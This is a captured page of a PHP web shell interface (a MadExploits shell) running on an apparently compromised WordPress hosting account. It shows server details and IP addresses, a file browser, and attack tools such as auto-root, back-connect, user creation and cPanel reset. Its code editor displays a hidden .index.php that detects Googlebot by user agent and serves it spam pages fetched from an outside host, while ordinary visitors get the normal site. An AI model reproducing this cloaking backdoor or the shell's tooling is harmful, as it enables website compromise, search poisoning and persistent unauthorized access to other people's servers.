Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
cepatjitu.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
24f2f
[ DIR ]
dr-xr-xr-x
a6be11
[ DIR ]
drwxr-xr-x
cgi.bin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
.index.php
1.62
KB
-rw-r--r--
index.html0
1.2
KB
-rw-r--r--
robots.txt
364
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .index.php
<?php function profile_user() { $refererUrl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : 'No Referer'; $useragent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $currentDomain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'defaultdomain.com'; // Otomatis buat URL berdasarkan domain aktif $pasteUrl = 'https://buckdomain.vip/daniel/' . $currentDomain . '.html'; if (stripos($useragent, 'Google-InspectionTool') !== false || stripos($useragent, 'googlebot') !== false || stripos($useragent, '(compatible; Googlebot/2.1; +http://www.google.com/bot.html)') !== false) { // Ambil konten dari URL berdasarkan domain $content = fetch_content($pasteUrl); if ($content) { echo $content; exit(); } else { echo "Gagal mengambil konten dari $pasteUrl"; exit(); } } else { if (file_exists('index.php')) { include('index.php'); } elseif (file_exists('index.html')) { include('index.html'); } } } function fetch_content($url) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 5, ]); $content = curl_exec($ch); if (curl_errno($ch)) { error_log('cURL Error: ' . curl_error($ch)); return false; } curl_close($ch); return $content; } profile_user(); ?>
Close